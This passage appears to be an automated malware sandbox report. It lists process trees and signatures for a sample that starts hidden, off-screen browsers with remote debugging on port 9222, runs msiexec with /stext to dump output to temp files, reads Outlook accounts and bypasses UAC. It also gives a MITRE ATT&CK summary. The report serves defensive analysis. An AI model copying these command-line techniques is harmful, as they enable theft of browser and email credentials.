  PID: 4416
Process (depth 4): C:\Program Files\Google\Chrome\Application\Chrome.exe
  Command line: "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3212,i,14496991912256574668,14449085253052895366,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3228 /prefetch:1
  Signatures:
  - Uses browser remote debugging
  PID: 2176
Process (depth 4): C:\Program Files\Google\Chrome\Application\Chrome.exe
  Command line: "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4600,i,14496991912256574668,14449085253052895366,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4584 /prefetch:1
  Signatures:
  - Uses browser remote debugging
  PID: 1016
Process (depth 3): C:\Windows\SysWOW64\msiexec.exe
  Command line: C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\onlp"
  Signatures:
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID: 4776
Process (depth 3): C:\Windows\SysWOW64\msiexec.exe
  Command line: C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\ziyiqji"
  Signatures:
  - Accesses Microsoft Outlook accounts
  - System Location Discovery: System Language Discovery
  PID: 1096
Process (depth 3): C:\Windows\SysWOW64\msiexec.exe
  Command line: C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\jkdbqctfne"
  Signatures:
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID: 1708
Process (depth 3): C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  Command line: --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
  Signatures:
  - Uses browser remote debugging
  - Enumerates system info in registry
  - Modifies registry class
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  PID: 584
Process (depth 4): C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff8475846f8,0x7ff847584708,0x7ff847584718
  PID: 3764
Process (depth 4): C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2236,11380142285246106220,14455053910454496757,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2268 /prefetch:2
  PID: 2456
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2236,11380142285246106220,14455053910454496757,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2320 /prefetch:3
Depth: 4
PID: 1108

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2236,11380142285246106220,14455053910454496757,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2896 /prefetch:8
Depth: 4
PID: 940

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2236,11380142285246106220,14455053910454496757,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:1
Depth: 4
- Uses browser remote debugging
PID: 3296

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2236,11380142285246106220,14455053910454496757,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3372 /prefetch:1
Depth: 4
- Uses browser remote debugging
PID: 912

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2236,11380142285246106220,14455053910454496757,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5480 /prefetch:1
Depth: 4
- Uses browser remote debugging
PID: 3832

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2236,11380142285246106220,14455053910454496757,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5488 /prefetch:1
Depth: 4
- Uses browser remote debugging
PID: 4472

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
Command line: "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
Depth: 1
PID: 852

C:\Windows\System32\CompPkgSrv.exe
Command line: C:\Windows\System32\CompPkgSrv.exe -Embedding
Depth: 1
PID: 2972

C:\Windows\System32\CompPkgSrv.exe
Command line: C:\Windows\System32\CompPkgSrv.exe -Embedding
Depth: 1
PID: 1144

Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
- Abuse Elevation Control Mechanism (1)
  - Bypass User Account Control (1)
Defense Evasion
- Abuse Elevation Control Mechanism (1)
  - Bypass User Account Control (1)
- Impair Defenses (1)
  - Disable or Modify Tools (1)
- Modify Authentication Process (1)
- Modify Registry (2)
Downloads